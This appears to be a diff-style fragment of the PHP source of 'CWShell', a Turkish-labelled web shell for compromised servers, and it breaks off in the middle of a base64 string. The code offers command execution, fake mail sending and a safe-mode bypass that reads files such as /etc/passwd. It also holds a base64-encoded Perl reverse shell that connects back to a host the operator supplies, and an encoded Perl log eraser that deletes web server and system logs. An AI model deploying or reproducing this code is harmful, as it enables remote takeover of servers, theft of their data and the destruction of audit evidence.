568	-	"img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
568	+	$filew = 0;
569	-	"sdb"=>array("sdb"),
569	+
570	-	"sess"=>array("sess"),
570	+	$num = 1;
571	-	"dwnld"=>array("exe","com","pif","src","lnk","zip","rar")
571	+
572	-	);
572	+
573	-	$filename = $files[$i]; $ext = explode(".",$filename);$c = count($ext)-1;$ext = $ext[$c];$ext = strtolower($ext);$rft = "";foreach($filetypes as $key=>$value){if (in_array($ext,$value)) {$ico = $key; break;} } if($ico==''){$ico = 'none';}}
573	+
574	-	$wtf = '/'.$files[$i];if ($wtf == $_SERVER['SCRIPT_NAME']) {echo"<tr style='background:#292929;'><td class='ico' style='color:#666;'>[shell]</td><td style='width:300px;'><input type='submit' style='background:#292929;' name='f_file' class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>";}
574	+	if (is_dir($dir))
575
576	-	echo"<tr style='background:#252525;'><td class='ico'>[$ico]</td><td style='width:300px;'><input type='submit' name='f_file' class='file' value='$files[$i]'></td><td class='filet'>$size</td><td class='filet'>$last_mod</td><td class='filet'>$perms </td></tr>"; }
576	+	{
577	-	}echo '</form></table><div style="padding-left:2px; padding-right:2px; padding-bottom:4px; background:#222;"><div class="filet" style="background:#272727; border-bottom:1px solid #2e2e2e">&nbsp</div></div>';do_footer($ver);}
577	+
578	-	else {echo ' <html><head><style>body{background:#333;}</style><title>login </title></head><body><table style="margin-left:100px; margin-top:100px; background:#222; font-family:Verdana; font-size:10px; color:#999; padding:4px; width:100%:"><tr><td><form method="post" style="margin:0px; padding:)px;">login: <input type="text" name="login" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> password: <input type="text" name="password" style="color:#999; border:1px solid #333; font-size:10px; background:#292929; padding:2px;"> <input type="submit" style="color:#999; border:0px; font-size:10px; background:#262626; height:20px;; font-family:Verdana;" value="go"></form></td></tr></table></body></html>';}
578	+	if ($open = opendir($dir))
579
580		{
581
582		if(is_dir($dir)) {
583
584		$typezz = "DIR";
585
586		$pahtw++;
587
588		}
589
590		while (($list = readdir($open)) == true)
591
592		{
593
594
595
596		if(is_dir($list)) {
597
598		$typezz = "DIR";
599
600		$pahtw++;
601
602		@$listf.= '<tr><td valign=top><img src=?com=image&img=folder><font size=2 face=Verdana>['.$list.']<td valign=top><font size=2 face=Verdana>'.$typezz.'</font></td><td valign=top></td><td valign=top><font size=2 face=Verdana>' . getperms($list) .'</font></td></tr>'; }
603
604		else {
605
606
607
608		$lolz = filesize($list) / 1024;
609
610		$lolx = intval($lolz);
611
612		if($lolx == 0) { $lolx = 1; }
613
614		$typezz = "DOSYA";
615
616		$filew++;
617
618		$listz = "/".$list;
619
620		if(eregi($page,$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
621
622		elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>'.$list.'</b><td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; }
623
624		else {@$listf.= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>'.$list.'<td valign=top><font size=2 face=Verdana>'.$typezz.'</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx .' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'; } }
625
626
627
628		}
629
630		closedir($open);
631
632
633
634		}
635
636		$fileq = $pahtw + $filew; }
637
638
639
640
641
642
643
644
645
646		echo "<html>
647
648		<head>
649
650		<style>
651
652		table.menu {
653
654		border-width: 0px;
655
656		border-spacing: 1px;
657
658		border-style: solid;
659
660		border-color: #a6a6a6;
661
662		border-collapse: separate;
663
664		background-color: rgb(98, 97,97);
665
666		}
667
668		table.menuz {
669
670		border-width: 0px;
671
672		border-spacing: 1px;
673
674		border-style: solid;
675
676		border-color: #a6a6a6;
677
678		border-collapse: separate;
679
680		background-color: rgb(98, 97,97);
681
682		}
683
684		table.menu td {
685
686		border-width: 1px;
687
688		padding: 1px;
689
690		border-style: none;
691
692		border-color: #333333;
693
694		background-color: #000000;
695
696		-moz-border-radius: 0px;
697
698		}
699
700		table.menuz tr {
701
702		border-width: 1px;
703
704		padding: 1px;
705
706		border-style: none;
707
708		border-color: #333333;
709
710		background-color: #000000;
711
712		-moz-border-radius: 0px;
713
714		}
715
716
717
718		table.menuz tr:hover {
719
720		background-color: #111111;
721
722		}
723
724		input,textarea,select {
725
726		font: normal 11px Verdana, Arial, Helvetica, sans-serif;
727
728		background-color:black;
729
730		color:#a6a6a6;
731
732		border: solid 1px #363636;
733
734		}
735
736		</style>
737
738
739
740		</head>
741
742		<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>
743
744		<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>
745
746		<tr><td>
747
748		<center><b><font size='6' face='Webdings'>ü</font>
749
750		<font face='Verdana' size='5'><a href='".@$_SERVER['HTTP_REFERER']."'>~ CWShell ~</font></a>
751
752		<font size='6' face='Webdings'>ü</font></b>
753
754		</center>
755
756		</td></tr></table><table class=menu width=100%<tr><td>
757
758		<font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br>
759
760		<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>
761
762		<b>Server Bilgisi : </b> <u>$info</u> <br>
763
764		<b>Uname -a:</b> <u>$uname</u> <br>
765
766		<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>
767
768		<b>Safe Mode:</b> <u>$safemode</u> <br>
769
770		<b>Sihirli Sozler:</b> <u>$quot</u> <br>
771
772		<b>Sayfa:</b> <u>$page</u><br>
773
774		<b>Boþ Alan:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br>
775
776		<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>
777
778		<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr>
779
780		<tr><td><form method='post' action=''>
781
782		<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>";
783
784		// Safe Mode Bypass
785
786		if(isset($_POST['safemodz']))
787
788		{
789
790		echo "<tr><td valign=top width=50%>
791
792		<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>
793
794		<form action='' method='post'>
795
796		<font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>
797
798		</td><tr>
799
800		<td valign=top>
801
802		<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>
803
804		<form method='post' action=''>
805
806		<font size='1' face='Verdana'>Klasör:</font><br>
807
808		<input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>";
809
810		}
811
812		// Safe Mode Bypass: File
813
814		if(isset($_POST['redfi']))
815
816		{
817
818		$test='';
819
820		$tempp= tempnam($test, "cx");
821
822		$get = htmlspecialchars($_POST['filew']);
823
824		if(copy("compress.zlib://".$get, $tempp)){
825
826		$fopenzo = fopen($tempp, "r");
827
828		$freadz = fread($fopenzo, filesize($tempp));
829
830		fclose($fopenzo);
831
832		$source = htmlspecialchars($freadz);
833
834		echo "<tr><td><center><font size='1' face='Verdana'>$get</font><br><textarea rows='20' cols='80' name='source'>$source</textarea>";
835
836		unlink($tempp);
837
838		} else {
839
840		echo "<tr><td><center><font size='1' color='red' face='Verdana'>HATA</font>";
841
842		}
843
844
845
846		}
847
848
849
850		// Safe Mode Bypass: Directory
851
852		if(isset($_POST['reddi'])){
853
854
855
856		function dirz()
857
858		{
859
860		$dirz = $_POST['directory'];
861
862		$files = glob("$dirz*");
863
864
865
866		foreach ($files as $filename) {
867
868		echo "<tr><td><font size='1' face='Verdana'>";
869
870		echo "$filename\n";
871
872		echo "</font><br>";
873
874		}
875
876		}
877
878		echo "<br>"; dirz();
879
880		}
881
882
883
884		// Connect Back
885
886		if(isset($_POST['connectback']))
887
888		{
889
890		echo "
891
892		<tr><td>
893
894		<center><font size='2' face='Verdana'><b>Back-Connect</b><br></font>
895
896		<form method='post' action=''><input type='text' name='connhost' size='15'value='target'> <input type='text' name='connport' size='5' value='port'> <input type='submit' name='connsub' value='Run'></form>";
897
898		}
899
900		if(isset($_POST['logeraser']))
901
902		{
903
904		echo "<tr><td>
905
906		<center><b><font size='2' face='Verdana'>:: OS ::<br></font></b>
907
908		<select name=functionp>
909
910		<option>linux</option>
911
912		<option>sunos</option>
913
914		<option>aix</option>
915
916		<option>irix</option>
917
918		<option>openbsd</option>
919
920		<option>solaris</option>
921
922		<option>suse</option>
923
924		<option>lampp</option>
925
926		<option>debian</option>
927
928		<option>freebsd</option>
929
930		<option>misc</option>
931
932		</select><br><input type='submit' name='runer' value='Erase'></table>";
933
934		}
935
936
937
938		// Connect Back
939
940		if(isset($_POST['connsub']))
941
942		{
943
944		$sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA==");
945
946		$openz = fopen("cbs.pl", "w+")or die("Error");
947
948		fwrite($openz, $sources)or die("Error");
949
950		fclose($openz);
951
952		$aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
953
954		unlink("cbs.pl");
955
956		}
957
958		if(isset($_POST['connsub'])) { echo "<tr><td><font color='lightgreen' face='Verdana' size='2'>Done.</font>"; }
959
960
961
962		// Logs Eraser
963
964		if(isset($_POST['runer']))
965
966		{
967
968		echo "<tr><td><center><textarea cols='30' rows='2'>";
969
970		$erase = base64_decode("IyF1c3IvYmluL3BlcmwNCiMgQ1dTSGVsbA0KICAgICAgIGNob21wKCRvcyA9ICRBUkdWWzBdKTsNCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcIm1pc2NcIil7ICNJZiBtaXNjIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdbWlzYyBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCI8dHI+WytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYSA9IHVubGluayBAbWlzYzsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJIA0KICAgICAgICAgICAgaWYoJGEpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwib3BlbmJzZFwiKXsgI0lmIG9wZW5ic2QgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11vcGVuYnNkIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGIgPSB1bmxpbmsgQG9wZW5ic2Q7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgIGlmKCRiKSB7cHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7ICAgfQ0KCQkJZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJmcmVlYnNkXCIpeyAjSWYgZnJlZWJzZCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXWZyZWVic2QgU2VsZWN0ZWQuLi5cXG5cIjsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7ICAgDQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkYyA9IHVubGluayBAZnJlZWJzZDsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRjKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJkZWJpYW5cIil7ICNJZiBEZWJpYW4gdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11kZWJpYW4gU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZCA9IHVubGluayBAZGViaWFuOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGQpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdXNlXCIpeyAjSWYgc3VzZSB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXXN1c2UgU2VsZWN0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICAkZSA9IHVubGluayBAc3VzZTsgICANCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgaWYoJGUpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSBlbHNlIHsgcHJpbnQgXCJbLV1FcnJvclwiOyB9DQogICAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcInNvbGFyaXNcIil7ICNJZiBzb2xhcmlzIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgIHByaW50IFwiWytdc29sYXJpcyBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRmID0gdW5saW5rIEBzb2xhcmlzOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgaWYoJGYpIHtwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgaWYoJG9zIGVxIFwibGFtcHBcIil7ICNJZiBsYW1wcCB0eXBlZCwgZG8gdGhlIGZvbGxvd2luZyBhbmQgc3RhcnQgYnJhY2tldHMNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxhbXBwIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGcgPSB1bmxpbmsgQGxhbXBwOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICBpZigkZykgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkgICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICBpZigkb3MgZXEgXCJyZWRoYXRcIil7ICNJZiByZWRoYXQgdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11SZWQgSGF0IExpbnV4L01hYyBPUyBYIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgc2xlZXAgMTsNCiAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgJGggPSB1bmxpbmsgQHJlZGhhdDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgIGlmKCRoKSB7IHByaW50IFwiWytdTG9ncyBTdWNjZXNzZnVsbHkgRGVsZXRlZC4uLlxcblwiOyB9DQoJCQkgIGVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCiAgICAgICAgICAgICAgfQ0KICAgICAgIA0KICAgICAgICAgICAgICAgIGlmKCRvcyBlcSBcImxpbnV4XCIpeyAjSWYgbGludXggdHlwZWQsIGRvIHRoZSBmb2xsb3dpbmcgYW5kIHN0YXJ0IGJyYWNrZXRzDQogICAgICAgICAgICAgcHJpbnQgXCJbK11MaW51eCBTZWxlY3RlZC4uLlxcblwiOyAgIA0KICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgcHJpbnQgXCJbK11Mb2dzIExvY2F0ZWQuLi5cXG5cIjsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICRpID0gdW5saW5rIEBsaW51eDsNCiAgICAgICAgICAgICBzbGVlcCAxOw0KCQkJaWYoJGkpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7fSANCgkJCWVsc2UgeyBwcmludCBcIlstXUVycm9yXCI7IH0NCgkJfSAgICAgIA0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICBpZigkb3MgZXEgXCJzdW5vc1wiKXsgI0lmIHN1bm9zIHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICBwcmludCBcIlsrXVN1bk9TIFNlbGVjdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgIHByaW50IFwiWytdTG9ncyBMb2NhdGVkLi4uXFxuXCI7DQogICAgICAgICAgICAgIHNsZWVwIDE7DQogICAgICAgICAgICAgICRsID0gdW5saW5rIEBzdW5vczsNCiAgICAgICAgICAgICAgaWYoJGwpIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9ICAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgaWYoJG9zIGVxIFwiYWl4XCIpeyAjSWYgYWl4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0cw0KICAgICAgICAgICAgICAgICBwcmludCBcIlsrXUFpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbSA9IHVubGluayBAYWl4Ow0KICAgICAgICAgICAgICBpZigkbSkgeyBwcmludCBcIlsrXUxvZ3MgU3VjY2Vzc2Z1bGx5IERlbGV0ZWQuLi5cXG5cIjsgfQ0KCQkJICAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgDQogICAgICAgICAgICAgIGlmKCRvcyBlcSBcImlyaXhcIil7ICNJZiBpcml4IHR5cGVkLCBkbyB0aGUgZm9sbG93aW5nIGFuZCBzdGFydCBicmFja2V0DQogICAgICAgICAgICAgIHByaW50IFwiWytdSXJpeCBTZWxlY3RlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICBwcmludCBcIlsrXUxvZ3MgTG9jYXRlZC4uLlxcblwiOw0KICAgICAgICAgICAgICBzbGVlcCAxOw0KICAgICAgICAgICAgICAkbiA9IHVubGluayBAaXJpeDsgICANCiAgICAgICAgICAgICAgaWYoJG4pIHsgcHJpbnQgXCJbK11Mb2dzIFN1Y2Nlc3NmdWxseSBEZWxldGVkLi4uXFxuXCI7IH0NCgkJCSAgZWxzZSB7IHByaW50IFwiWy1dRXJyb3JcIjsgfQ0KICAgICAgICAgICAgICB9DQoNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI01pc2MgTG9nIExvY2F0aW9ucyAgIA0KICAgICAgeyAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICBAbWlzYyA9IChcIi9ldGMvaHR0cGQvbG9ncy9hY2Nlc3MubG9nXCIsIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yLmxvZ1wiLFwiL2V0Yy9odHRwZC9sb2dzL2FjY2Vzc19sb2dcIiwNCiAgICAgICAgICAgIFwiL2V0Yy9odHRwZC9sb2dzL2Vycm9yX2xvZ1wiLFwiL3Vzci9sb2NhbC9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2Vycm9yX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdXNyL2xvY2FsL2FwYWNoZS9sb2dzL2FjY2Vzcy5sb2dcIixcIi91c3IvbG9jYWwvYXBhY2hlL2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9hcGFjaGUvZXJyb3JfbG9nXCIsXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLFwiL3Zhci9sb2cvYXBhY2hlL2Vycm9yLmxvZ1wiLFwiL3Zhci9sb2cvYWNjZXNzX2xvZ1wiLA0KICAgICAgICAgICAgXCIvdmFyL2xvZy9lcnJvcl9sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3IubG9nXCIsXCIvdmFyL3d3dy9sb2dzL2FjY2Vzcy5sb2dcIixcIi92YXIvd3d3L2xvZ3MvZXJyb3JfbG9nXCIsDQogICAgICAgICAgICBcIi92YXIvd3d3L2xvZ3MvYWNjZXNzX2xvZ1wiKQ0KICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBPcGVuQlNEIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBvcGVuYnNkID0gKFwiL3Zhci93d3cvbG9nL2FjY2Vzc19sb2dcIiwgXCIvdmFyL3d3dy9sb2cvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRnJlZUJTRCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAZnJlZWJzZCA9IChcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvYWNjZXNzX2xvZ1wiLCBcIi91c3IvbG9jYWwvZXRjL2h0dHBkL2xvZ3MvZXJyb3JfbG9nXCIpDQogICAgICAgICAgIH0NCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgRGViaWFuIFN5c3RlbXMNCiAgIA0KICAgICAgew0KICAgICAgIEBkZWJpYW4gPSAoXCIvdmFyL2xvZy9hcGFjaGUvYWNjZXNzLmxvZ1wiLCBcIi92YXIvbG9nL2FwYWNoZS9lcnJvci5sb2dcIiwNCiAgICAgICBcIi92YXIvbG9nL2FwYWNoZS1zc2wvZXJyb3IubG9nXCIsIFwiL3Zhci9sb2cvYXBhY2hlLXNzbC9hY2Nlc3MubG9nXCIpDQogICAgICAgICAgIH0gICANCg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI0xvZ3Mgb2YgU3VTRSBMaW51eCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAc3VzZSA9IChcIi92YXIvbG9nL2h0dHBkL2FjY2Vzc19sb2dcIiwgXCIvdmFyL2xvZy9odHRwZC9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBTb2xhcmlzIFN5c3RlbXMNCiAgIA0KICAgICAgeyAgIA0KICAgICAgIEBzb2xhcmlzID0gKFwiL3Zhci9hcGFjaGUvbG9ncy9hY2Nlc3NfbG9nXCIsIFwiL3Zhci9hcGFjaGUvbG9ncy9lcnJvcl9sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBMYW1wcCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAbGFtcHAgPSAoXCIvb3B0L2xhbXBwL2xvZ3MvZXJyb3JfbG9nXCIsIFwiL29wdC9sYW1wcC9sb2dzL2FjY2Vzc19sb2dcIikNCiAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjTG9ncyBvZiBSZWQgSGF0LCBNYWMgT1MgWCBTeXN0ZW1zDQogICANCiAgICAgIHsNCiAgICAgICBAcmVkaGF0ID0gKFwiL3Zhci9sb2cvaHR0cGQvYWNjZXNzX2xvZ1wiLCBcIi92YXIvbG9nL2h0dHBkL2Vycm9yX2xvZ1wiKQ0KICAgICAgICAgICB9DQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICNMb2dzIG9mIElyaXggU3lzdGVtcw0KICAgDQogICAgICB7DQogICAgICAgQGlyaXggPSAoXCIvdmFyL2FkbS9TWVNMT0dcIiwgXCIvdmFyL2FkbS9zdWxvZ1wiLCBcIi92YXIvYWRtL3V0bXBcIiwgXCIvdmFyL2FkbS91dG1weFwiLA0KICAgICAgICAgICAgICBcIi92YXIvYWRtL3d0bXBcIiwgXCIvdmFyL2FkbS93dG1weFwiLCBcIi92YXIvYWRtL2xhc3Rsb2cvXCIsDQogICAgICAgICAgICBcIi91c3Ivc3Bvb2wvbHAvbG9nXCIsIFwiL